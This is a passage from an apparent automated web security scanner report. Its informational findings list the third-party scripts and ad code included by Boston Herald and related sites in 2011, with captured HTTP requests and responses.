Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/279790573/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=279790573?">\n');
document.write ('</SCRIPT>
...[SNIP]...

18.104. https://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The response dynamically includes the following scripts from other domains:

https://liveperson-partners.s3.amazonaws.com/shared/js/mbox.js
https://roi.business.com/crm/js/conversion.js
https://ssl.google-analytics.com/ga.js

Request

Response

18.105. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle

Request

Response

18.106. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/@!

Request

GET /includes/processAds.bg HTTP/1.1
Host: bh.heraldinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:30 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1381
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/@!"></script>
...[SNIP]...

18.107. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top

Request

Response

18.108. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom

Request

Response

18.109. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Request

Response

18.110. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Request

Response

18.111. http://boston30.autochooser.com/results.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boston30.autochooser.com
Path:	/results.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.bostonherald.com/navigation/hiasysMJX.js
http://www.google-analytics.com/urchin.js
http://www.homefind.com/include/bgNavEng2.js

Request

Response

18.112. http://bostonherald.com/blogs/entertainment/the_assistant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/entertainment/the_assistant/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects

Request

GET /blogs/entertainment/the_assistant/?p=3065 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.113. http://bostonherald.com/blogs/lifestyle/fork_lift/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/lifestyle/fork_lift/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects

Request

GET /blogs/lifestyle/fork_lift/?p=3679 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.114. http://bostonherald.com/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.115. http://bostonherald.com/news/document.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/document.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

Response

18.116. http://bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.117. http://bostonherald.com/news/regional/view/20110128copsgrannyattacksrobber/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20110128copsgrannyattacksrobber/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20110128copsgrannyattacksrobber/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.118. http://bostonherald.com/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.119. http://bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /projects/your_tax_dollars.bg?src=Mefa HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.120. http://bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /search/?topic=Annette+Bening&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.121. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.122. http://bostonherald.com/track/inside_track/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/inside_track/?position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.123. http://bostonherald.com/track/inside_track/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.124. http://bostonherald.com/track/star_tracks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/star_tracks/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.125. http://bostonherald.com/track/star_tracks/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.126. http://bostonherald.com/users/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /users/login HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.127. http://bostonherald.com/users/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/register/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /users/register/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

